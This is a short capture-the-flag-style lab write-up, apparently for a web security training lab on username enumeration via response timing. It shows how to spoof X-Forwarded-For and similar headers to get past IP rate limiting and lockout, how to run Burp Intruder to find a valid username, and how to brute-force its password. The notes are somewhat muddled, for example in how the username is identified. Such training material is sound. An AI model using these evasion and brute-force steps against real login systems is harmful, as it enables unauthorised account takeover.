Lab: Username enumeration via response timing

The application will block you after few attempts

get the header checklist

https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/rate-limiting

when you put this in the header request

it will remove your restriction

X-Real-Ip: 1.2.3.4

X-Forwarded-For: 1.2.3.4

X-Originating-Ip: 1.2.3.4

Client-Ip: 1.2.3.4

True-Client-Ip: 1.2.3.4

then try sending like 5 attempts

it will also lock

changing the ip from 1.2.3.4 to 1.2.3.5

you will get unlocked

X-Real-Ip: 1.2.3.5

X-Forwarded-For: 1.2.3.5

X-Originating-Ip: 1.2.3.5

Client-Ip: 1.2.3.5

True-Client-Ip: 1.2.3.5

when you change the others headers and you still got restricted

it means that 'X-Forwarded-For:1.2.3.5'

is the only header we need

X-Forwarded-For: 1.2.3.5
X-Originating-Ip: 1.2.3.6
Client-Ip: 1.2.3.6
True-Client-Ip: 1.2.3.6

choose pitchfork it will try the number first in the set 1

then it will try the usernames in set 2

use a long string password so that we will know what is the valid username based on response data

for set 1 choose number 10-110 because we have 101 usernames in username.txt

load the usernames

ftp user is the highest response received

why? because ftp is a valid username and that's why with the password that is too long it will response also a large amount of data

now we will bruteforce for password

put ftp as username

Now we have jordan password since it returns 302 status code indicates a redirection to another page

we cant really login as of now because we have a lockout with 30mins

but we can intercept the request and use the payload 'x-forwarded'

with correct username and password

X-Forwarded-For: 10.20.30.50

now we solved the lab

PreviousLab: Username enumeration via subtly different responsesNextLab: Brute-forcing a stay-logged-in cookie

Last updated